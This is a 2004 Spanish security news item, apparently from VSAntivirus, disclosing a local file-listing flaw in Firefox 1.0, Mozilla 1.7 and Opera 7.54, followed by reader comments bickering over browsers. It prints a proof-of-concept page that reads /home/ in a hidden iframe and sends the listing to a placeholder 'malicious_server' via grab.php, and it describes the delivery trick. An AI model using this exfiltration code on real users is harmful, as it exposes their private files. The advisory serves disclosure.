- Noticias relacionadas
- Otras noticias
Microsoft publica cuatro nuevos parches.jpg)
La supuesta infidelidad de Beckham, excusa para un virus 
Más del 95% de los usuarios que pierden sus datos ya utilizaba medidas de seguridad
Una herramienta maliciosa gestiona los datos confidenciales de más de 30.000 usuarios.jpg)
Todo lo que hay que saber sobre el exploit WMF
Las brechas de seguridad online del Reino Unido, al descubierto.jpg)
Dos nuevas versiones del Bagle se propagan por la red
Nuevas técnicas de robo de identidad: llega el Skype Phishing
Aparece una nueva variante del gusano Bagle que se distribuye junto a fotografías
Encuentan una vulnerabilidad de denegación de servicio en RealPlayer (archivos .MID)
- En el foro
Vulnerabilidad en URI del tipo "data:" en Opera
La versión 1.7.5 Mozilla corrige una vulnerabilidad en el protocolo NNTP.jpg)
Ejecución de comandos en Opera-
VULNERABILIDADES
Revelación de información en Mozilla, Firefox y Opera
03 Dic 2004 | VS ANTIVIRUS
La explotación de este fallo, podría revelar información local a un atacante, según informa vsantivirus.
Se ha publicado la siguiente prueba de concepto (PoC):<html>
<body onLoad="
list_files='';
for(i=0;i<local_files.document.links.length;i++)
{list_files+=local_files.document.links.item(i);}
alert(list_files);
//send list_files at malicious_server
document.location.href=
'http://malicious_server/grab.php?list='+list_files;
">
<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>
</body>
</html>Un servidor malicioso puede obtener el contenido del directorio "/home/" (o "c:Document and Setting" en sistemas Windows), y de ese modo tener conocimiento de una serie de archivos de usuario presentes en el sistema.
También podría ser posible conocer si un determinado programa se encuentra en el equipo afectado, con la intención de sacar provecho de ello en un posterior ataque.
De todos modos, esto no puede ser explotado en forma directa por un sitio Web malicioso, ya que la página es abierta desde un camino local (file :/ /localpath/code.htm, donde code.htm es el ejemplo anterior), desde que el iframe "local_files" pertenece a un dominio local.
Con Internet Explorer este código no funciona a nivel local.
Para que un atacante saque provecho de esto, debe hacer que el usuario abra http :/ /maliciuos_server/code.htm, y que el servidor malicioso responda con una página conteniendo un campo "Content-Type" desconocido (por ejemplo "text/html." con un punto al final), para que el navegador muestre una ventana de diálogo con algunas opciones (Abrir, Guardar, Cancelar).
Seleccionando "Abrir" para ver la página, esta será descargada y abierta desde una ubicación local, permitiendo que el código en JavaScript se ejecute en un contexto local (lo mismo ocurrirá si selecciona "Guardar" y luego abre la página).
En Opera, para que funcione este método de explotación remota, debe estar configurado como aplicación por defecto para abrir y guardar archivos.
No existe solución al momento actual, de parte de los vendedores involucrados, quienes han sido avisados el 24 de noviembre pasado, según el autor de este descubrimiento.
Son afectados los siguientes productos:
- Firefox 1.0 (y anteriores)
- Mozilla 1.7 (y anteriores)
- Opera 7.54 (y anteriores)
Referencias:
Disclosure of file system information in Mozilla Firefox and Opera Browser
http://www.securityfocus.com/archive/1/382855 - Boletín
Si quieres recibir cada semana las noticias más interesantes suscríbete a nuestro boletín.
- Comentarios
- Publicidad
- Ahora en LaFlecha puedes encontrar cursos y másters
Yo he dejado de usar Firefox por eso. No quiero que nadie vea mis archivos.
menuda gilipollez, el ie es un coladero continuo de virus, cosa q el firefox no es
El FireFox y Mozilla son los mejores navegadores que tenemos los usuarios, son seguros, rapidos y son creados por un grupo de programadores magnificos, que solo trabajan por el bien de todos!
No son perfectos, eso es claro, ningun ser humano lo es y por consiguiente sus productos tienen errores, pero a diferencia de los de otras compañias, como el maligno IE del innombrable, no se preocupan por arreglar los problemas en sus productos, los de mozilla.org SI.
Por esto deja de decir toterias (para el del primer comentario) que es mejor el software libre y no el propietario!
Por un mundo mejor...
Por todos nosotros...
No use mas productos de Microsoft
Linux pride!
porque no usas MacOS?
MACOS, sistema operativo mas seguro que ninguna de esas piltrafillas de operativos.
EL mejor navegador es IE, esa mierda de firefox en poco tiempo ya tiene varias vulnerabilidades
ADIOSSSSSSS LINUX y TODA SU MIERDA
Peleandoce por pendejadas, para quien dijo el comentario de los parches de windows o ie, hace poco salio una vulnerabilidad en el ie, parecido por el iframe y cosas de esas, y en menos de una semana ya estaba resuelto, y este error tiene elmismo tiempo que salio, y no ha salido el parche
Kien kritica a linuxsin fundamentos deja la clara muestra de que es un pobre fracasado traumado inutil
Amigos, al final da lo mismo si ud. usa IE o Firefox o el navegador que sea, no se trata de abanderizarse por nadie, TODOS los navegadores tienen fortalezas y debilidades, IE fue un pionero y por lo tanto tiene mas experiencia a lo largo de los años, además de poseer un Team de profesionales PAGADOS que independiente del humor con que se despierten tienen que trabajar para microsoft. El recién nacido (publicamente) Firefox está creciendo como todo niño, rápido, dando muchas luces de genialidad, todos lo bajan para verlo, probarlo, hacerle arrumacos al niñito nuevo, a pesar de todo me parece un buen navegador, solo el tiempo dará resultados concretos de consolidación, pero me parece de adolescentes el decir "muera microsoft o muera firefox" ¿que es eso? esperen a que se les seque el ombligo y que se les pase el olor a leche antes de opinar con las hormonas y no con el cerebro.